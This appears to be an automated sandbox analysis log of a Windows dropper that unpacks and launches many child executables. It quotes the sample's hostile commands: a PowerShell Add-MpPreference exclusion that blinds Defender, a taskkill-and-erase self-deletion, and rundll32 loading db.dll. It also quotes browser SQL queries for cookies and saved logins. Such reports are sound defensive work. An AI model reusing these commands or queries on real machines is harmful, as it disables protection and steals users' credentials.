                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925d5ee10_0da12a.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ea53e7_da60dc03.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe 6282925c504be_44b654a9fe.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ea53e7_da60dc03.exe 6282925ea53e7_da60dc03.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exe 6282925d5ee10_0da12a.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe" -h
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exe 6282925b8abce_97dd7946.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmp "C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmp" /SL5="$7022C,506127,422400,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exe"
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 548
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "6282925c504be_44b654a9fe.exe" /f & erase "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "6282925c504be_44b654a9fe.exe" /f
                    Source: C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-OATKC.tmp\lBo5.exe "C:\Users\user\AppData\Local\Temp\is-OATKC.tmp\lBo5.exe" /S /UID=1405
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",global
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp "C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp" /SL5="$B0054,921114,831488,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",global
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282924fea1c3_82ebfc59.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 628292505a6c3_91a0215e.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829251169ea_9dc91d.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829252dc457_91e450cbce.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829254ab49d_fc210c4a.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925776f05_4ee107b.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829258f111c_8df26f0c7d.exe /mixtwoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ab52f1_fdd12e5.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925b8abce_97dd7946.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925c504be_44b654a9fe.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925d5ee10_0da12a.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ea53e7_da60dc03.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe 6282924fea1c3_82ebfc59.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe 62829251169ea_9dc91d.exe Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe 62829252dc457_91e450cbce.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe" -hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exe 62829254ab49d_fc210c4a.exe Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp "C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp" /SL5="$B0054,921114,831488,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe 6282925776f05_4ee107b.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe 62829258f111c_8df26f0c7d.exe /mixtwo
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe 6282925ab52f1_fdd12e5.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exe 6282925b8abce_97dd7946.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe 6282925c504be_44b654a9fe.exe
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,16_2_004AF110
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7EJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0041A4DC GetDiskFreeSpaceW,16_2_0041A4DC
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",global
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:120:WilError_01
                    Source: setup_install.exeString found in binary or memory: -stop
                    Source: 62829252dc457_91e450cbce.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: T4IoJqcAwY.exeStatic file information: File size 9083840 > 1048576
                    Source: Binary string: C:\xar\zawekagohuzexo y.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404732639.000000000599E000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.412630998.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404830454.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403316521.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.409031718.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403685832.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404362762.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403002087.0000000005822000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.402470240.000000000599E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\cigu doyokixiyika.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000000.278752671.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 6282925776f05_4ee107b.exe, 00000014.00000000.278249927.0000000001018000.00000002.00000001.01000000.0000000C.sdmp, 6282925776f05_4ee107b.exe, 00000014.00000002.517791843.0000000001018000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: BC:\cigu doyokixiyika.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000000.278752671.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\velelawovid.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, 62829254ab49d_fc210c4a.exe, 00000012.00000000.276485648.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\lafowapewozu72-recup.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.423352963.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426200970.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.430828364.0000000005E66000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428321954.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.427455632.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.431562259.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429105140.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.434306290.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429512950.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.440901157.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428978878.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.435223737.0000000005FBB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.436121107.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.433193147.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.432385043.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426632292.0000000005822000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 675C:\xar\zawekagohuzexo y.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404732639.000000000599E000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.412630998.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404830454.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403316521.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.409031718.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403685832.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404362762.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403002087.0000000005822000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.402470240.000000000599E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ZC:\lafowapewozu72-recup.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.423352963.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426200970.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.430828364.0000000005E66000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428321954.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.427455632.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.431562259.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429105140.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.434306290.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429512950.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.440901157.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428978878.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.435223737.0000000005FBB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.436121107.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.433193147.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.432385043.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426632292.0000000005822000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\ratiji\kizakekajaco-vo.pdb source: T4IoJqcAwY.exe, 00000000.00000003.253868476.000000000424C000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: /C:\ratiji\kizakekajaco-vo.pdb source: T4IoJqcAwY.exe, 00000000.00000003.253868476.000000000424C000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeUnpacked PE file: 11.2.6282924fea1c3_82ebfc59.exe.1f0000.0.unpack JM`(q:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeUnpacked PE file: 18.2.62829254ab49d_fc210c4a.exe.400000.0.unpack .text:ER;.data:W;.liwef:R;.suvaron:R;.disexim:R;.dakev:ER;.rsrc:R;.reloc:R; vs .text:EW;
                    Obfuscated command line found
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmp "C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmp" /SL5="$7022C,506127,422400,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exe"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp "C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp" /SL5="$B0054,921114,831488,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp "C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp" /SL5="$B0054,921114,831488,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_3_02086CAD push cs; retf 0_3_02086CC3
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00414150 push ecx; mov dword ptr [esp], ecx0_2_00414151
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00418D80 push eax; ret 0_2_00418D9E
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00418DB0 push eax; ret 0_2_00418DDE
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004680F0 push edx; mov dword ptr [esp], ebx5_2_00468301
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004680F0 push eax; mov dword ptr [esp], ebx5_2_0046831B
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043E08D push edx; mov dword ptr [esp], ebx5_2_0043E0A1
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004480AE push edx; mov dword ptr [esp], ebx5_2_004480C2
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0042209A push eax; mov dword ptr [esp], ebx5_2_004981A6
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00456160 push eax; mov dword ptr [esp], ebx5_2_00456760
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0042209A push eax; mov dword ptr [esp], ebx5_2_004981A6
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0044018A push ecx; mov dword ptr [esp], ebx5_2_0044019E
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043839A push eax; mov dword ptr [esp], ebx5_2_004383B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00480480 push eax; mov dword ptr [esp], esi5_2_004973BD
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043854B push eax; mov dword ptr [esp], esi5_2_00438579
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00438551 push eax; mov dword ptr [esp], esi5_2_00438579
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043859B push eax; mov dword ptr [esp], esi5_2_00438579
